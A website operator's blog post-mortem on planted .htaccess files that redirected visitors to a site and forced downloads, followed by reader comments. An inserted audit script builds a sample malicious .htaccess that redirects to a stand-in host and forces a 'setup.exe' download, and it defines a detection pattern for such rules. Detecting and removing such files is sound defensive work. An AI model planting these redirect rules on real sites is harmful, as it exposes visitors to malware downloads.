At roughly 6 PM US Pacific Time, the Jared Rimer Network was contacted about a web site outage by the person who runs and pays for the hosting of 986themix.com. Below, we detail what we found, the steps taken to resolve the problem, and how to contact the network with further questions.
What happened?
We aren’t completely sure what happened. Visitors to the main site were being prompted to download files, and the files were strangely named. The JRN doesn’t understand how this could be the case, since the network had visited the site several days earlier out of curiosity about something else it had seen.
What did you find?
What we found were multiple .htaccess files located on the server.
Some of the files were located in user-specific directories for podcasts that are hosted on the mix. The link we provide is to Mozilla’s developer site, where this file is described in more detail, so please check it out if you’re interested in what these files are and what they can do. It is a very powerful mechanism, but one that can damage your web site if misused.
The .htaccess files were dated from February 28th to 9:36 am today. While I don’t understand the .htaccess format in full, what I could tell from each of them was that some redirect was happening, though I don’t know where to. Some even contained cPanel-generated sections with a statement that those lines should not be deleted.
How many files were found?
I think there were about half a dozen of these files, with varying degrees of similarity to what I described above. All of them had different time stamps, however.
What did you do?
After determining that none of us who manage the web site wrote these files, or even have the knowledge to write them, I felt safe deleting them, as they were clearly redirecting somewhere and causing the browser to download strange files. No web site should ever ask you to download strangely named files. Anything offered for download over the Internet needs to be clearly marked as to what it is, either placed on a page or clearly indicated in communication with the intended recipients.
Per policies set by our provider, files may not be left on our server without being linked. This can be taken loosely, though, because if you’re sending someone a link to a file, you’re sending a link.
After I deleted all of these files, I instructed the owner to change the password to the account, since I thought it possible that someone got in through the control panel and uploaded these files through the file management interface.
The site should now be up and operational.
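As an added illustration of the audit described above (this is not part of the original post and not the JRN’s own procedure), the following shell script shows one way to find .htaccess files that appeared within a date range and pick out the directives that would redirect visitors elsewhere or push a download on them. It constructs its own sample docroot, so it runs offline; the paths, dates, hostname and file contents are assumptions, and the cPanel-managed block in the legitimate file is included because the post notes such blocks carry a do-not-edit notice and should be left alone.

```shell
#!/bin/sh
# Added example, not code from the original post. Builds a constructed docroot
# containing one legitimate .htaccess and one planted .htaccess, then lists
# every .htaccess modified since a given date whose directives can redirect
# visitors or force a file download. Paths, dates, hostnames and file
# contents below are assumptions made for the demonstration.

# Directives worth a human look: external redirects, MIME types that force a
# download, and Content-Disposition headers. Ordinary internal RewriteRules
# (e.g. WordPress pretty permalinks) are deliberately not matched.
SUSPECT='^[[:space:]]*(RewriteRule[[:space:]].*https?://|Redirect(Match|Permanent|Temp)?[[:space:]].*https?://|ForceType[[:space:]]|AddType[[:space:]]+application/(octet-stream|x-msdownload)|Header[[:space:]]+.*Content-Disposition)'

# Create a throwaway docroot with sample files and print its path.
make_sample_docroot() {
    root=$(mktemp -d)
    mkdir -p "$root/podcasts/user1"
    # Legitimate file (assumed): the cPanel-managed PHP handler block, which
    # must stay, plus a spam IP block of the kind the post mentions.
    cat > "$root/.htaccess" <<'EOF'
# php -- BEGIN cPanel-generated handler, do not edit
AddHandler application/x-httpd-ea-php74 .php
# php -- END cPanel-generated handler, do not edit
<RequireAll>
Require all granted
Require not ip 203.0.113.0/24
</RequireAll>
EOF
    # Planted file (constructed) in a podcast directory the owner never
    # touches: sends every browser to an external host and forces a download
    # of an oddly named file.
    cat > "$root/podcasts/user1/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (msie|chrome|firefox) [NC]
RewriteRule ^.*$ http://example.invalid/dl/x7f2.php [R=302,L]
ForceType application/octet-stream
Header set Content-Disposition "attachment; filename=setup.exe"
EOF
    printf '%s\n' "$root"
}

# Print each .htaccess under $1 modified since $2 (YYYY-MM-DD) that contains a
# suspect directive, followed by the offending lines indented with their
# line numbers. -newermt is a GNU/BSD find extension.
audit_htaccess() {
    docroot=$1
    since=$2
    find "$docroot" -name .htaccess -newermt "$since" | sort | while IFS= read -r f; do
        hits=$(grep -Ein "$SUSPECT" "$f" || true)
        [ -n "$hits" ] || continue
        printf '%s\n' "$f"
        printf '%s\n' "$hits" | sed 's/^/    /'
    done
}

# Paths only, for feeding a review list or a backup-then-delete loop.
suspect_paths() {
    audit_htaccess "$1" "$2" | grep -v '^    ' || true
}

# Stand-alone demo: only the planted podcast-directory file is reported.
root=$(make_sample_docroot)
audit_htaccess "$root" 2024-02-28
rm -rf "$root"
```

Run as-is, it prints the planted podcast-directory file with its three offending lines and stays silent about the legitimate file. The list is for review, not automatic deletion: an absolute Redirect to your own domain will show up too. Removing the flagged files stops the redirect, but the uploader’s access path (the control panel password the post mentions, or a writable directory) is a separate question, so it is worth also listing everything else that changed in the same window, for example `find DOCROOT -type f -newermt 2024-02-28` with the real date.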
Who should I contact for questions?
Please contact Jared Rimer of the Jared Rimer Network at 818-921-4976, or by text/WhatsApp at 804-442-6975. Please use this contact and bug reporting form for email communication.
Thank you for your continued support. We’re as safe as possible under the circumstances. We hope this doesn’t happen again; if it does, rest assured that the JRN will take the necessary steps to fix the problem quickly and efficiently.
Hello Shaun,
This report isn’t for jaredrimer.net, although there was another issue in regards to it which partially affected me to comment as I was logged in. I’ve resolved that.
The post-mortem report was meant to give the public information on the particular issue. I’m glad that this blog was not affected by the issue, although some of my RSS feeds elsewhere were, but I’ve resolved that.
I deleted the .htaccess file on the main server thinking something had happened, but found another one in a directory I don’t access or put anything in, and that was the problem. The .htaccess file I had had IP ranges and IPs that I wanted blocked because of spam, but I will give all of that another chance and just call it good.
Thanks for reading!
Well nothing showed on the monitor so it didn’t come from here.
There wasn’t even a downtime recorded.
Mind you I was busy and wasn’t on here yesterday.
The only thing I changed was WordPress login via WordPress, by turning it off because of 2-step breakages.
Automattic has actually contacted me saying it’s my provider, but since no one uses WordPress direct except for myself, I will just log in via the standard login.
There have been no issues on health status, and no breaches of the security system, including no fake users.
The only htaccess modifications I allowed were the ones to do with the SSL plugins on here, but that was ages ago.
The plugins did it themselves, and I assume as long as the certs stay valid, and/or I need to touch them in any case.
We have blocked over 128k brute-force intrusions, and that number goes up slightly every month. The attacks are constant, but nothing has breached the security.
The site has kept itself updated, including its plugins, and I get emailed regular updates and search reports from my various tools.
I don’t have main server access anyway.